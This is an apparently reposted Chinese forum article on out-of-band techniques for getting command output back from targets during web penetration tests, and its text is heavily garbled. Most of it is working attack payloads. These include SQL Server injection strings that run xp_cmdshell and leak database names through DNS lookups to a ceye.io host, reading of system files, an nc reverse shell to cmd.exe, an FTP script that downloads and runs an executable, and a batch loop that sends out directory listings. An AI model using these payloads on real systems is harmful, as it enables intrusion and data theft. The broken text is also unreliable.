[21666] 2021-02-11_WEB渗透测试中回显的一些技巧

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-02-11_WEB渗透测试中回显的一些技巧 W E B   L e m o n S e c   2 0 2 1 - 0 2 - 1 1 W E B W E B S E H L L         W E B S Q L X S S         C s q l U N I O N w i n d o w s H T T P L I N U X W E B L I N U X 使 W I N D O W S W E B S H E L L
s q l m a p   s q l m a p s q l m a p h t t p s s q l m a p 访 b u r p b u r p h t t p s b u r p s q l m a p   p r o x y   h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 8 0 s q l m a p u s e r a g e n t   u s e r - a g e n t     ,
U N I O N o s - s h e l l S H E L L S q l m a p s q l m a p o s - s h e l l x p _ c m d s h e l l x p _ c m d s h e l l c e y e . i o D N S p i n g   d n s D N S D N S 1 H t t p R e q u e s t D a t a 2 / / % 2 b   / / + , , e x e c D N S ' ' 3 4 h t t p s : / / * * * / * * . p h p ? i d = 2 1 ; E X E C   x p _ c m d s h e l l   ' p i n g   a 1 . * * * . c e y e . i o D E C L A R E   @ r e t u r n T e x t   V A R C H A R ( 5 0 0 ) ; D E C L A R E   @ s t a t u s   i n t ; D E C L A R E   @ u r l S t r   V A R C H A R ( 2 5 5 ) ; S E T   @ u r l S t r   = ' h t t p : / / d d d . * * * . c e y e . i o / a ' ; E X E C   P _ G E T _ H t t p R e q u e s t D a t a     @ u r l S t r ,   @ s t a t u s   O U T P U T ,   @ r e t u r n T e x t       O U T P U T ; h t t p s : / / * * * / * * . p h p ? i d = 2 1 ; d e c l a r e   @ @ h p   v a r c h a r ( 8 0 0 ) ; s e t   @ @ h p = d b _ n a m e ( 0 ) ; e x e c ( ' e x e c   x p _ c m d s h e l l   ' ' ' % 2 b @ @ h p % 2 b ' . * * * . c e y e . i o a . e x e ' ' ' ) ; c r e a t e   d a t a b a s e   r a i n ; d e c l a r e   @ @ h p   v a r c h a r ( 8 0 0 ) ; s e t   @ @ h p   =   d b _ n a m e ( ) ; e x e c ( ' b a c k u p   l o g   [ r a i n ]   t o   d i s k = ' ' ' + @ @ h p + ' .   * * * . c e y e . i o a . e x e ' ' ; ' ) ; - -   / / + c r e a t e   t a b l e   t e s t ( t 1   n v a r c h a r ( 2 5 5 ) ,   i d   i n t ) ; D E C L A R E   @ r e s u l t   v a r c h a r ( 2 5 5 ) ; E X E C   x p _ c m d s h e l l   ' p i n g  
5   6 访 ( V P S 访 ) 7 n c 8 f t p f t p Q u i c k   E a s y   F T P   S e r v e r   V 4 . 0 . 0   访 f t p   o p e n I P ,   c : w i n d o w s t e m p b a t   , p i n g   d n s   b a t D N S 访     f t p   9 b a t m y t e s t 1 . * * * . c e y e . i o ' , @ r e s u l t   o u t p u t ; i n s e r t   i n t o   t e s t ( t 1 )   v a l u e s ( @ r e s u l t ) ; a n d   1 = ( s e l e c t   t o p   1   t 1   f r o m   t e s t )   a n d   1 = ( s e l e c t   c o u n t ( * )   f r o m   t e s t   w h e r e   t 1 > 1 ) ; d r o p   t a b l e   c m d ; c r e a t e   t a b l e   c m d   ( a   t e x t ) ; B U L K   I N S E R T   c m d   F R O M   ' c : b o o t . i n i '   W I T H   ( F I E L D T E R M I N A T O R   =   ' n ' , R O W T E R M I N A T O R   = ' n n ' ) * * * w e b s e r v e r . e x e n c   - v v   i p   8 0 9 0   - e   c : w i n d o w s s y s t e m 3 2 c m d . e x e n c   - v v   - l   - p   8 0 9 0 e c h o   o p e n   * * * > c : w i n d o w s t e m p f t p 1 . t x t     e c h o   x > > c : w i n d o w s t e m p f t p 1 . t x t     e c h o   x > > c : w i n d o w s t e m p f t p 1 . t x t e c h o   b i n a r y   > > c : w i n d o w s t e m p f t p 1 . t x t / /     e c h o   g e t   s e r v e r . e x e   c : w i n d o w s t e m p s e r v e r . e x e   > > c : w i n d o w s t e m p f t p 1 . t x t       e c h o   b y e   > > c : w i n d o w s t e m p f t p 1 . t x t     f t p   - s : c : w i n d o w s t e m p f t p 1 . t x t     d e l   c : w i n d o w s t e m p f t p 1 . t x t d i r   / b / a - d / o d   c : w i n d o w s t e m p   > t e s t . t x t     / /   d i r   / b / a - d / o d   f o r   / f   " d e l i m s = "   % % a   i n   ( t e s t . t x t )   d o   ( p i n g   % % a . * * * . c e y e . i o )   / / D N S
p i n g D N S b a t   ^ <   > % % 2 5 L e m o n S e c e c h o   d i r   / b / a - d / o d   c : w i n d o w s t e m p   ^ > t e s t . t x t   >   c : w i n d o w s t e m p d i r . b a t e c h o   f o r   / f   " d e l i m s = "   % 2 5 % 2 5 a   i n   ( t e s t . t x t )   d o   ( p i n g   % 2 5 % 2 5 a . * * * . c e y e . i o )   > > c : w i n d o w s t e m p d i r . b a t

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则